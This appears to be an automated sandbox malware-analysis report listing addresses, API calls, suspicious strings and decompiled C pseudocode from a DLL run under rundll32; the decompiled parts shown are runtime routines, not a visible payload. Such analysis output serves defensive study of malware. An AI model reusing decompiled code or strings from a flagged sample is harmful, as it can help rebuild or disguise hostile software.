                                                                                                                                                                                      0x6e9e1ce3
                                                                                                                                                                                      0x6e9e1d62
                                                                                                                                                                                      0x6e9e1d64
                                                                                                                                                                                      0x6e9e1d67
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9e1d67
                                                                                                                                                                                      0x6e9e1c62
                                                                                                                                                                                      0x6e9e1c66
                                                                                                                                                                                      0x6e9e1c6a
                                                                                                                                                                                      0x6e9e1c6c
                                                                                                                                                                                      0x6e9e1ce7
                                                                                                                                                                                      0x6e9e1cf8
                                                                                                                                                                                      0x6e9e1cfb
                                                                                                                                                                                      0x6e9e1cfc
                                                                                                                                                                                      0x6e9e1d01
                                                                                                                                                                                      0x6e9e1d04
                                                                                                                                                                                      0x6e9e1d09
                                                                                                                                                                                      0x6e9e1d6f
                                                                                                                                                                                      0x6e9e1d73
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9e1d0b
                                                                                                                                                                                      0x6e9e1d0b
                                                                                                                                                                                      0x6e9e1d10
                                                                                                                                                                                      0x6e9e1de9
                                                                                                                                                                                      0x6e9e1dec
                                                                                                                                                                                      0x6e9e1dec
                                                                                                                                                                                      0x6e9e1df3
                                                                                                                                                                                      0x6e9e1df6
                                                                                                                                                                                      0x6e9e1e2b
                                                                                                                                                                                      0x6e9e1e2b
                                                                                                                                                                                      0x6e9e1e32
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9e1df8
                                                                                                                                                                                      0x6e9e1df8
                                                                                                                                                                                      0x6e9e1dfa
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9e1dfc
                                                                                                                                                                                      0x6e9e1dfc
                                                                                                                                                                                      0x6e9e1e00
                                                                                                                                                                                      0x6e9e1e02
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9e1e02
                                                                                                                                                                                      0x6e9e1dfa
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9e1d16
                                                                                                                                                                                      0x6e9e1d16
                                                                                                                                                                                      0x6e9e1d1a
                                                                                                                                                                                      0x6e9e1d1c
                                                                                                                                                                                      0x6e9e1e85
                                                                                                                                                                                      0x6e9e1e87
                                                                                                                                                                                      0x6e9e1e89
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9e1d22
                                                                                                                                                                                      0x6e9e1d26
                                                                                                                                                                                      0x6e9e1d2a
                                                                                                                                                                                      0x6e9e1d2b
                                                                                                                                                                                      0x6e9e1d30
                                                                                                                                                                                      0x6e9e1d35
                                                                                                                                                                                      0x6e9e1d3a
                                                                                                                                                                                      0x6e9e1d77
                                                                                                                                                                                      0x6e9e1d7b
                                                                                                                                                                                      0x6e9e1d7c
                                                                                                                                                                                      0x6e9e1d7d
                                                                                                                                                                                      0x6e9e1d82
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9e1d82
                                                                                                                                                                                      0x6e9e1d1c
                                                                                                                                                                                      0x6e9e1d10
                                                                                                                                                                                      0x6e9e1c6e
                                                                                                                                                                                      0x6e9e1c6e
                                                                                                                                                                                      0x6e9e1c70
                                                                                                                                                                                      0x6e9e1e54
                                                                                                                                                                                      0x6e9e1e59
                                                                                                                                                                                      0x6e9e1e5c
                                                                                                                                                                                      0x6e9e1e5e
                                                                                                                                                                                      0x6e9e1e6d
                                                                                                                                                                                      0x6e9e1e72
                                                                                                                                                                                      0x6e9e1e75
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9e1c76
                                                                                                                                                                                      0x6e9e1c76
                                                                                                                                                                                      0x6e9e1c78
                                                                                                                                                                                      0x6e9e1c81
                                                                                                                                                                                      0x6e9e1c84
                                                                                                                                                                                      0x6e9e1d3e
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9e1c8a
                                                                                                                                                                                      0x6e9e1c8a
                                                                                                                                                                                      0x6e9e1c91
                                                                                                                                                                                      0x6e9e1c93
                                                                                                                                                                                      0x6e9e1c96
                                                                                                                                                                                      0x6e9e1c9a
                                                                                                                                                                                      0x6e9e1ca1
                                                                                                                                                                                      0x6e9e1ca3
                                                                                                                                                                                      0x6e9e1ca7
                                                                                                                                                                                      0x6e9e1d8a
                                                                                                                                                                                      0x6e9e1d8d
                                                                                                                                                                                      0x6e9e1d90
                                                                                                                                                                                      0x6e9e1e77
                                                                                                                                                                                      0x6e9e1e77
                                                                                                                                                                                      0x6e9e1e79
                                                                                                                                                                                      0x6e9e1e7e
                                                                                                                                                                                      0x6e9e1e8e
                                                                                                                                                                                      0x6e9e1e8e
                                                                                                                                                                                      0x6e9e1e93
                                                                                                                                                                                      0x6e9e1e96
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9e1d96
                                                                                                                                                                                      0x6e9e1d9c
                                                                                                                                                                                      0x6e9e1d9d
                                                                                                                                                                                      0x6e9e1da2
                                                                                                                                                                                      0x6e9e1da5
                                                                                                                                                                                      0x6e9e1daa
                                                                                                                                                                                      0x6e9e1dae
                                                                                                                                                                                      0x6e9e1d42
                                                                                                                                                                                      0x6e9e1d42
                                                                                                                                                                                      0x6e9e1d49
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9e1db0
                                                                                                                                                                                      0x6e9e1db0
                                                                                                                                                                                      0x6e9e1db4
                                                                                                                                                                                      0x6e9e1db8
                                                                                                                                                                                      0x6e9e1dba
                                                                                                                                                                                      0x6e9e1dbd
                                                                                                                                                                                      0x6e9e1e98
                                                                                                                                                                                      0x6e9e1e98
                                                                                                                                                                                      0x6e9e1e9c
                                                                                                                                                                                      0x6e9e1e9e
                                                                                                                                                                                      0x6e9e1ea6
                                                                                                                                                                                      0x6e9e1eaf
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9e1dc3
                                                                                                                                                                                      0x6e9e1dc3
                                                                                                                                                                                      0x6e9e1dcb
                                                                                                                                                                                      0x6e9e1dcc
                                                                                                                                                                                      0x6e9e1dcd
                                                                                                                                                                                      0x6e9e1dd2
                                                                                                                                                                                      0x6e9e1dd5
                                                                                                                                                                                      0x6e9e1dda
                                                                                                                                                                                      0x6e9e1e08
                                                                                                                                                                                      0x6e9e1e0c
                                                                                                                                                                                      0x6e9e1e0f
                                                                                                                                                                                      0x6e9e1e11
                                                                                                                                                                                      0x6e9e1e15
                                                                                                                                                                                      0x6e9e1eb2
                                                                                                                                                                                      0x6e9e1eb6
                                                                                                                                                                                      0x6e9e1eb8
                                                                                                                                                                                      0x6e9e1ec0
                                                                                                                                                                                      0x6e9e1ec5
                                                                                                                                                                                      0x6e9e1ec6
                                                                                                                                                                                      0x6e9e1ec6
                                                                                                                                                                                      0x6e9e1ece
                                                                                                                                                                                      0x6e9e1ed1
                                                                                                                                                                                      0x6e9e1ed6
                                                                                                                                                                                      0x6e9e1ed9
                                                                                                                                                                                      0x6e9e1edf
                                                                                                                                                                                      0x6e9e1f05
                                                                                                                                                                                      0x6e9e1f0b
                                                                                                                                                                                      0x6e9e1f29
                                                                                                                                                                                      0x6e9e1f2f
                                                                                                                                                                                      0x6e9e1fa2
                                                                                                                                                                                      0x6e9e1fa8
                                                                                                                                                                                      0x6e9e205e
                                                                                                                                                                                      0x6e9e2064
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9e2066
                                                                                                                                                                                      0x6e9e2066
                                                                                                                                                                                      0x6e9e206c
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9e206e
                                                                                                                                                                                      0x6e9e206e
                                                                                                                                                                                      0x6e9e2074
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9e2074
                                                                                                                                                                                      0x6e9e206c
                                                                                                                                                                                      0x6e9e1fae
                                                                                                                                                                                      0x6e9e1fae
                                                                                                                                                                                      0x6e9e1fb4
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9e1fba
                                                                                                                                                                                      0x6e9e1fba
                                                                                                                                                                                      0x6e9e1fc0
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9e1fc6
                                                                                                                                                                                      0x6e9e1fc6
                                                                                                                                                                                      0x6e9e1fcc
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9e1fd2
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9e1fd2
                                                                                                                                                                                      0x6e9e1fcc
                                                                                                                                                                                      0x6e9e1fc0
                                                                                                                                                                                      0x6e9e1fb4
                                                                                                                                                                                      0x6e9e1f31
                                                                                                                                                                                      0x6e9e1f31
                                                                                                                                                                                      0x6e9e1f37
                                                                                                                                                                                      0x6e9e2020
                                                                                                                                                                                      0x6e9e2026
                                                                                                                                                                                      0x6e9e20a1
                                                                                                                                                                                      0x6e9e2028
                                                                                                                                                                                      0x6e9e2028
                                                                                                                                                                                      0x6e9e202e
                                                                                                                                                                                      0x6e9e20f1
                                                                                                                                                                                      0x6e9e2034
                                                                                                                                                                                      0x6e9e2034
                                                                                                                                                                                      0x6e9e203a
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9e203c
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9e203c
                                                                                                                                                                                      0x6e9e203a
                                                                                                                                                                                      0x6e9e202e
                                                                                                                                                                                      0x6e9e1f3d
                                                                                                                                                                                      0x6e9e1f3d
                                                                                                                                                                                      0x6e9e1f43
                                                                                                                                                                                      0x6e9e20dd
                                                                                                                                                                                      0x6e9e1f49
                                                                                                                                                                                      0x6e9e1f49
                                                                                                                                                                                      0x6e9e1f4f
                                                                                                                                                                                      0x6e9e20e1
                                                                                                                                                                                      0x6e9e1f55
                                                                                                                                                                                      0x6e9e1f55
                                                                                                                                                                                      0x6e9e1f5b
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9e1f61
                                                                                                                                                                                      0x6e9e1f64
                                                                                                                                                                                      0x6e9e1f64
                                                                                                                                                                                      0x6e9e1f5b
                                                                                                                                                                                      0x6e9e1f4f
                                                                                                                                                                                      0x6e9e1f43
                                                                                                                                                                                      0x6e9e1f37
                                                                                                                                                                                      0x6e9e1f0d
                                                                                                                                                                                      0x6e9e1f0d
                                                                                                                                                                                      0x6e9e1f13
                                                                                                                                                                                      0x6e9e1f16
                                                                                                                                                                                      0x6e9e1f23
                                                                                                                                                                                      0x6e9e1f23
                                                                                                                                                                                      0x6e9e200e
                                                                                                                                                                                      0x6e9e2011
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9e2013
                                                                                                                                                                                      0x6e9e2013
                                                                                                                                                                                      0x6e9e2019
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9e201b
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9e201b
                                                                                                                                                                                      0x6e9e2019
                                                                                                                                                                                      0x6e9e2011
                                                                                                                                                                                      0x6e9e1ee1
                                                                                                                                                                                      0x6e9e1ee1
                                                                                                                                                                                      0x6e9e1ee7
                                                                                                                                                                                      0x6e9e1f65
                                                                                                                                                                                      0x6e9e1f6b
                                                                                                                                                                                      0x6e9e1fd7
                                                                                                                                                                                      0x6e9e1fdd
                                                                                                                                                                                      0x6e9e2082
                                                                                                                                                                                      0x6e9e2088
                                                                                                                                                                                      0x6e9e2099
                                                                                                                                                                                      0x6e9e208a
                                                                                                                                                                                      0x6e9e208a
                                                                                                                                                                                      0x6e9e2090
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9e2092
                                                                                                                                                                                      0x6e9e2095
                                                                                                                                                                                      0x6e9e2095
                                                                                                                                                                                      0x6e9e2090
                                                                                                                                                                                      0x6e9e1fe3
                                                                                                                                                                                      0x6e9e1fe3
                                                                                                                                                                                      0x6e9e1fe9
                                                                                                                                                                                      0x6e9e20ed
                                                                                                                                                                                      0x6e9e1fef
                                                                                                                                                                                      0x6e9e1fef
                                                                                                                                                                                      0x6e9e1ff5
                                                                                                                                                                                      0x6e9e209d
                                                                                                                                                                                      0x6e9e1ffb
                                                                                                                                                                                      0x6e9e1ffb
                                                                                                                                                                                      0x6e9e2001
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9e2003
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9e2003
                                                                                                                                                                                      0x6e9e2001
                                                                                                                                                                                      0x6e9e1ff5
                                                                                                                                                                                      0x6e9e1fe9
                                                                                                                                                                                      0x6e9e1f6d
                                                                                                                                                                                      0x6e9e1f6d
                                                                                                                                                                                      0x6e9e1f73
                                                                                                                                                                                      0x6e9e2041
                                                                                                                                                                                      0x6e9e2047
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9e2049
                                                                                                                                                                                      0x6e9e2049
                                                                                                                                                                                      0x6e9e204f
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9e2051
                                                                                                                                                                                      0x6e9e2051
                                                                                                                                                                                      0x6e9e2057
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9e2059
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9e2059
                                                                                                                                                                                      0x6e9e2057
                                                                                                                                                                                      0x6e9e204f
                                                                                                                                                                                      0x6e9e1f79
                                                                                                                                                                                      0x6e9e1f79
                                                                                                                                                                                      0x6e9e1f7f
                                                                                                                                                                                      0x6e9e20e5
                                                                                                                                                                                      0x6e9e1f85
                                                                                                                                                                                      0x6e9e1f85
                                                                                                                                                                                      0x6e9e1f8b
                                                                                                                                                                                      0x6e9e20e9
                                                                                                                                                                                      0x6e9e1f91
                                                                                                                                                                                      0x6e9e1f91
                                                                                                                                                                                      0x6e9e1f97
                                                                                                                                                                                      0x6e9e2076
                                                                                                                                                                                      0x6e9e2079
                                                                                                                                                                                      0x6e9e1f9d
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9e1f9d
                                                                                                                                                                                      0x6e9e1f97
                                                                                                                                                                                      0x6e9e1f8b
                                                                                                                                                                                      0x6e9e1f7f
                                                                                                                                                                                      0x6e9e1f73
                                                                                                                                                                                      0x6e9e1ee9
                                                                                                                                                                                      0x6e9e1ee9
                                                                                                                                                                                      0x6e9e1eec
                                                                                                                                                                                      0x6e9e1ef2
                                                                                                                                                                                      0x6e9e1ef8
                                                                                                                                                                                      0x6e9e1eff
                                                                                                                                                                                      0x6e9e1eff
                                                                                                                                                                                      0x6e9e20f2
                                                                                                                                                                                      0x6e9e20f5
                                                                                                                                                                                      0x6e9e20f5
                                                                                                                                                                                      0x6e9e1ee7
                                                                                                                                                                                      0x6e9e1e1b
                                                                                                                                                                                      0x6e9e1e1b
                                                                                                                                                                                      0x6e9e1e1b
                                                                                                                                                                                      0x6e9e1e1d
                                                                                                                                                                                      0x6e9e1e24
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9e1e24
                                                                                                                                                                                      0x6e9e1ddc
                                                                                                                                                                                      0x6e9e1ddc
                                                                                                                                                                                      0x6e9e1de2
                                                                                                                                                                                      0x6e9e1e39
                                                                                                                                                                                      0x6e9e1e39
                                                                                                                                                                                      0x6e9e1e3e
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9e1e3e
                                                                                                                                                                                      0x6e9e1dda
                                                                                                                                                                                      0x6e9e1dbd
                                                                                                                                                                                      0x6e9e1dae
                                                                                                                                                                                      0x6e9e1cad
                                                                                                                                                                                      0x6e9e1cad
                                                                                                                                                                                      0x6e9e1c25
                                                                                                                                                                                      0x6e9e1c25
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9e1c25
                                                                                                                                                                                      0x6e9e1ca7
                                                                                                                                                                                      0x6e9e1c84
                                                                                                                                                                                      0x6e9e1c70
                                                                                                                                                                                      0x6e9e1c6c
                                                                                                                                                                                      0x6e9e1c16
                                                                                                                                                                                      0x6e9e1c16
                                                                                                                                                                                      0x6e9e1c32
                                                                                                                                                                                      0x6e9e1c32
                                                                                                                                                                                      0x6e9e1c39
                                                                                                                                                                                      0x6e9e1c3c
                                                                                                                                                                                      0x6e9e1c3c
                                                                                                                                                                                      0x6e9e1c42
                                                                                                                                                                                      0x6e9e1c49
                                                                                                                                                                                      0x6e9e1c49
                                                                                                                                                                                      0x6e9e1c14
                                                                                                                                                                                      0x6e9e1c0d

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetStdHandle.KERNEL32(000000F4,?,?,?,?,?,?,?,?,?,6E9E1A7E,?), ref: 6E9E1C05
                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,6E9E1A7E,?), ref: 6E9E1C16
                                                                                                                                                                                      • GetConsoleMode.KERNEL32(00000000,?), ref: 6E9E1C58
                                                                                                                                                                                      • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 6E9E1CD3
                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,00000000), ref: 6E9E1D55
                                                                                                                                                                                      Strings
                                                                                                                                                                                      • Unexpected number of bytes for incomplete UTF-8 codepoint.C:hblnvdkuwjldwqihlnxtdgmpotoebajfmrqgmtnnutixvbqajdevcxgcqgdhsiilwcvdkgzorjjpjapcqyybtuxulzftbxrvddihohqaoiyqfmhasplljpbebhbcelwx, xrefs: 6E9E1E45
                                                                                                                                                                                      • assertion failed: !handle.is_null()C:dhidzhitbujbfqqncawhogkkniegcctcaffidkzeqdjseyaidkczyyqaglapgqobugufdomajsuqnpsbinwfvrqqdagbgthjkpsvdrffbyloxsjdadyxwklhzxnssljgptb, xrefs: 6E9E1E5E
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000003.00000002.533794908.000000006E9D1000.00000020.00020000.sdmp, Offset: 6E9D0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000003.00000002.533790341.000000006E9D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533812681.000000006E9FA000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533838172.000000006EA2D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533844049.000000006EA2F000.00000008.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533848975.000000006EA30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6e9d0000_rundll32.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ErrorLast$ConsoleFileHandleModeWrite
                                                                                                                                                                                      • String ID: Unexpected number of bytes for incomplete UTF-8 codepoint.C:hblnvdkuwjldwqihlnxtdgmpotoebajfmrqgmtnnutixvbqajdevcxgcqgdhsiilwcvdkgzorjjpjapcqyybtuxulzftbxrvddihohqaoiyqfmhasplljpbebhbcelwx$assertion failed: !handle.is_null()C:dhidzhitbujbfqqncawhogkkniegcctcaffidkzeqdjseyaidkczyyqaglapgqobugufdomajsuqnpsbinwfvrqqdagbgthjkpsvdrffbyloxsjdadyxwklhzxnssljgptb
                                                                                                                                                                                      • API String ID: 4172320683-1866377508
                                                                                                                                                                                      • Opcode ID: 8a24d72ec900fb36f02dd8b532213fecc73d8eda8fd8d938d8928261c67d1854
                                                                                                                                                                                      • Instruction ID: f34a5307f6bda91a3881232f98956c422ad7162fc3965adfc9c16185d887b2f9
                                                                                                                                                                                      • Opcode Fuzzy Hash: 8a24d72ec900fb36f02dd8b532213fecc73d8eda8fd8d938d8928261c67d1854
                                                                                                                                                                                      • Instruction Fuzzy Hash: 3F71CCB06087019FD3158FA6D49576B7BE9AF96308F04882DE5DA87780E771D88C8F12
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 45%
                                                                                                                                                                                      			E6E9DC4D0(void* __ebx, void* __edi, void* __esi, void* _a8) {
                                                                                                                                                                                      				long _v20;
                                                                                                                                                                                      				intOrPtr _v24;
                                                                                                                                                                                      				char _v28;
                                                                                                                                                                                      				intOrPtr _v32;
                                                                                                                                                                                      				signed int _v36;
                                                                                                                                                                                      				char _v40;
                                                                                                                                                                                      				long _v48;
                                                                                                                                                                                      				void* __ebp;
                                                                                                                                                                                      				void* _t22;
                                                                                                                                                                                      				void* _t29;
                                                                                                                                                                                      				void* _t30;
                                                                                                                                                                                      				signed int _t43;
                                                                                                                                                                                      				signed int _t47;
                                                                                                                                                                                      				signed int _t50;
                                                                                                                                                                                      				void* _t54;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t32 = __ebx;
                                                                                                                                                                                      				_v32 = _t54 - 0x20;
                                                                                                                                                                                      				_v20 = 0xffffffff;
                                                                                                                                                                                      				_v24 = E6E9E3990;
                                                                                                                                                                                      				_v28 =  *[fs:0x0];
                                                                                                                                                                                      				 *[fs:0x0] =  &_v28;
                                                                                                                                                                                      				_v48 = 0;
                                                                                                                                                                                      				__imp__AcquireSRWLockExclusive(0x6ea2e108, __esi, __edi, __ebx);
                                                                                                                                                                                      				_t47 =  *0x6ea2d038; // 0x1
                                                                                                                                                                                      				_t50 =  *0x6ea2d03c; // 0x0
                                                                                                                                                                                      				_v40 = 0x6ea2e108;
                                                                                                                                                                                      				_t43 = _t47 & _t50;
                                                                                                                                                                                      				if(_t43 == 0xffffffff) {
                                                                                                                                                                                      					L8:
                                                                                                                                                                                      					_v36 = _t43;
                                                                                                                                                                                      					__imp__ReleaseSRWLockExclusive(0x6ea2e108);
                                                                                                                                                                                      					_v20 = 0;
                                                                                                                                                                                      					_t22 = E6E9F99A0("failed to generate unique thread ID: bitspace exhausted", 0x37, 0x6ea1fa80);
                                                                                                                                                                                      					goto L10;
                                                                                                                                                                                      				} else {
                                                                                                                                                                                      					 *0x6ea2d038 = _t47 + 1;
                                                                                                                                                                                      					asm("adc ecx, 0x0");
                                                                                                                                                                                      					 *0x6ea2d03c = _t50;
                                                                                                                                                                                      					if((_t47 | _t50) == 0) {
                                                                                                                                                                                      						_v36 = _t43;
                                                                                                                                                                                      						_v20 = 0;
                                                                                                                                                                                      						_t22 = E6E9F94E0(__ebx, "called `Option::unwrap()` on a `None` value", 0x2b, _t47, _t50, __eflags, 0x6ea1fa90);
                                                                                                                                                                                      						L10:
                                                                                                                                                                                      						asm("ud2");
                                                                                                                                                                                      						__eflags = _v36 - 0xffffffff;
                                                                                                                                                                                      						if(_v36 != 0xffffffff) {
                                                                                                                                                                                      							E6E9DC6B0(_t22,  &_v40);
                                                                                                                                                                                      						}
                                                                                                                                                                                      						return E6E9DC690( &_v48);
                                                                                                                                                                                      					} else {
                                                                                                                                                                                      						__imp__ReleaseSRWLockExclusive(0x6ea2e108);
                                                                                                                                                                                      						_t29 =  *0x6ea2e128; // 0x2a40000
                                                                                                                                                                                      						if(_t29 != 0) {
                                                                                                                                                                                      							L5:
                                                                                                                                                                                      							_t30 = HeapAlloc(_t29, 0, 0x20);
                                                                                                                                                                                      							if(_t30 == 0) {
                                                                                                                                                                                      								goto L7;
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								 *(_t30 + 8) = _t47;
                                                                                                                                                                                      								 *(_t30 + 0xc) = _t50;
                                                                                                                                                                                      								 *(_t30 + 0x10) = 0;
                                                                                                                                                                                      								 *((char*)(_t30 + 0x18)) = 0;
                                                                                                                                                                                      								 *_t30 = 1;
                                                                                                                                                                                      								 *(_t30 + 4) = 1;
                                                                                                                                                                                      								 *[fs:0x0] = _v28;
                                                                                                                                                                                      								return _t30;
                                                                                                                                                                                      							}
                                                                                                                                                                                      						} else {
                                                                                                                                                                                      							_t29 = GetProcessHeap();
                                                                                                                                                                                      							if(_t29 == 0) {
                                                                                                                                                                                      								L7:
                                                                                                                                                                                      								_t43 = 8;
                                                                                                                                                                                      								E6E9F92F0(_t32, 0x20, 8, _t47, _t50, __eflags);
                                                                                                                                                                                      								asm("ud2");
                                                                                                                                                                                      								goto L8;
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								 *0x6ea2e128 = _t29;
                                                                                                                                                                                      								goto L5;
                                                                                                                                                                                      							}
                                                                                                                                                                                      						}
                                                                                                                                                                                      					}
                                                                                                                                                                                      				}
                                                                                                                                                                                      			}


















                                                                                                                                                                                      0x6e9dc4d0
                                                                                                                                                                                      0x6e9dc4d9
                                                                                                                                                                                      0x6e9dc4dc
                                                                                                                                                                                      0x6e9dc4e3
                                                                                                                                                                                      0x6e9dc4f4
                                                                                                                                                                                      0x6e9dc4f7
                                                                                                                                                                                      0x6e9dc4fd
                                                                                                                                                                                      0x6e9dc509
                                                                                                                                                                                      0x6e9dc50f
                                                                                                                                                                                      0x6e9dc515
                                                                                                                                                                                      0x6e9dc51b
                                                                                                                                                                                      0x6e9dc524
                                                                                                                                                                                      0x6e9dc529
                                                                                                                                                                                      0x6e9dc5bf
                                                                                                                                                                                      0x6e9dc5bf
                                                                                                                                                                                      0x6e9dc5c7
                                                                                                                                                                                      0x6e9dc5cd
                                                                                                                                                                                      0x6e9dc5e3
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dc52f
                                                                                                                                                                                      0x6e9dc536
                                                                                                                                                                                      0x6e9dc53d
                                                                                                                                                                                      0x6e9dc542
                                                                                                                                                                                      0x6e9dc548
                                                                                                                                                                                      0x6e9dc5ed
                                                                                                                                                                                      0x6e9dc5f0
                                                                                                                                                                                      0x6e9dc606
                                                                                                                                                                                      0x6e9dc60e
                                                                                                                                                                                      0x6e9dc60e
                                                                                                                                                                                      0x6e9dc617
                                                                                                                                                                                      0x6e9dc61b
                                                                                                                                                                                      0x6e9dc620
                                                                                                                                                                                      0x6e9dc620
                                                                                                                                                                                      0x6e9dc631
                                                                                                                                                                                      0x6e9dc54e
                                                                                                                                                                                      0x6e9dc553
                                                                                                                                                                                      0x6e9dc559
                                                                                                                                                                                      0x6e9dc560
                                                                                                                                                                                      0x6e9dc570
                                                                                                                                                                                      0x6e9dc575
                                                                                                                                                                                      0x6e9dc57c
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dc57e
                                                                                                                                                                                      0x6e9dc57e
                                                                                                                                                                                      0x6e9dc581
                                                                                                                                                                                      0x6e9dc584
                                                                                                                                                                                      0x6e9dc58b
                                                                                                                                                                                      0x6e9dc58f
                                                                                                                                                                                      0x6e9dc595
                                                                                                                                                                                      0x6e9dc59f
                                                                                                                                                                                      0x6e9dc5ad
                                                                                                                                                                                      0x6e9dc5ad
                                                                                                                                                                                      0x6e9dc562
                                                                                                                                                                                      0x6e9dc562
                                                                                                                                                                                      0x6e9dc569
                                                                                                                                                                                      0x6e9dc5ae
                                                                                                                                                                                      0x6e9dc5b3
                                                                                                                                                                                      0x6e9dc5b8
                                                                                                                                                                                      0x6e9dc5bd
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dc56b
                                                                                                                                                                                      0x6e9dc56b
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dc56b
                                                                                                                                                                                      0x6e9dc569
                                                                                                                                                                                      0x6e9dc560
                                                                                                                                                                                      0x6e9dc548

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6EA2E108), ref: 6E9DC509
                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6EA2E108), ref: 6E9DC553
                                                                                                                                                                                      • GetProcessHeap.KERNEL32 ref: 6E9DC562
                                                                                                                                                                                      • HeapAlloc.KERNEL32(02A40000,00000000,00000020), ref: 6E9DC575
                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6EA2E108), ref: 6E9DC5C7
                                                                                                                                                                                      Strings
                                                                                                                                                                                      • failed to generate unique thread ID: bitspace exhausted, xrefs: 6E9DC5D4
                                                                                                                                                                                      • called `Option::unwrap()` on a `None` value, xrefs: 6E9DC5F7
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000003.00000002.533794908.000000006E9D1000.00000020.00020000.sdmp, Offset: 6E9D0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000003.00000002.533790341.000000006E9D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533812681.000000006E9FA000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533838172.000000006EA2D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533844049.000000006EA2F000.00000008.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533848975.000000006EA30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6e9d0000_rundll32.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ExclusiveLock$HeapRelease$AcquireAllocProcess
                                                                                                                                                                                      • String ID: called `Option::unwrap()` on a `None` value$failed to generate unique thread ID: bitspace exhausted
                                                                                                                                                                                      • API String ID: 1780889587-1657987152
                                                                                                                                                                                      • Opcode ID: 8dce7fb8ef4235230363752a3abe16aa681b2fa9a120c0e68e4116c8e854619c
                                                                                                                                                                                      • Instruction ID: 4c6e9a496041166d57a54fef8cd9fb65b11c7d670d9da38024e1b78958b3641c
                                                                                                                                                                                      • Opcode Fuzzy Hash: 8dce7fb8ef4235230363752a3abe16aa681b2fa9a120c0e68e4116c8e854619c
                                                                                                                                                                                      • Instruction Fuzzy Hash: EF31DEB49046158FEB008FE4D8087AD7BB8EF99324F188129D415AF390D7749989CF95
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 74%
